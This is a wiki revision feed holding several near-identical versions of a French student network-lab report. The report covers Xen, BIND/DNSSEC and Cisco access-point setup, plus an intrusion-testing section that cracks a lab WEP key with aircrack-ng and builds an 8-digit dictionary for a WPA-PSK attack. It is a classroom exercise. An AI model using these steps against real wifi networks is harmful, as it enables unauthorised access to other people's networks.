- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56426</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56426"/>
				<updated>2021-11-19T12:46:22Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Lancer les commandes &lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire '''toad59.space.dnssec''' pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
- Renommer les clefs :&lt;br /&gt;
 mv Ktoad59.site.+005+26968.key toad59.site-ksk.key&lt;br /&gt;
 mv Ktoad59.site.+005+26968.private toad59.site-ksk.private&lt;br /&gt;
 mv Ktoad59.site.+005+27570.key toad59.site-zsk.key&lt;br /&gt;
 mv Ktoad59.site.+005+27570.private toad59.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
- Inclure les clefs publiques dans dans le fichier db.toad59.site&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-ksk.key&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
- Signer les enregistrements à partir du répertoire '''toad59.space.dnssec'''&lt;br /&gt;
 dnssec-signzone -o toad59.site -k toad59.site-ksk  ../db.toad59.site toad59.site-zsk&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''named.conf.local''' pour utiliser db.toad59.site.signed&lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;etc/bind/db.toad59.site.signed&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56425</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56425"/>
				<updated>2021-11-19T12:45:56Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du serveur DNS par DNSSEC */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Lancer les commandes &lt;br /&gt;
 ifdown eth0&lt;br /&gt;
 ifup eth0&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
- Obtention d'un certificat via OpenSSL :&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout toad59.site.key -out toad59.site.csr&lt;br /&gt;
&lt;br /&gt;
Dans le champ common name, il est important de saisir : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Acheter un certificat clé pour se connecter de façon sécurisée sur Gandi en passant par la rubrique Cerificat SSL.csr, généré à l'étape précédente.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Il faut à présent sécuriser le serveur DNS en signant la zone correspondant à mon nom de domaine.&lt;br /&gt;
&lt;br /&gt;
- Dé-commenter la ligne suivante dans le fichier '''named.conf.options''' :&lt;br /&gt;
 dnssec-enable yes&lt;br /&gt;
&lt;br /&gt;
- Créer un repertoire '''toad59.space.dnssec''' pour y génerer des clefs :&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de signature de clefs de zone'''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
'''La clé asymétrique de zone pour les enregistrements '''&lt;br /&gt;
 dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE toad59.site&lt;br /&gt;
&lt;br /&gt;
- Renommer les clefs :&lt;br /&gt;
 mv Ktoad59.site.+005+26968.key toad59.site-ksk.key&lt;br /&gt;
 mv Ktoad59.site.+005+26968.private toad59.site-ksk.private&lt;br /&gt;
 mv Ktoad59.site.+005+27570.key toad59.site-zsk.key&lt;br /&gt;
 mv Ktoad59.site.+005+27570.private toad59.site-zsk.private&lt;br /&gt;
&lt;br /&gt;
- Inclure les clefs publiques dans dans le fichier db.toad59.site&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-ksk.key&lt;br /&gt;
 $include /etc/bind/lulya.space.dnssec/toad59.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
- Signer les enregistrements à partir du répertoire '''toad59.space.dnssec'''&lt;br /&gt;
 dnssec-signzone -o toad59.site -k toad59.site-ksk  ../db.toad59.site toad59.site-zsk&lt;br /&gt;
&lt;br /&gt;
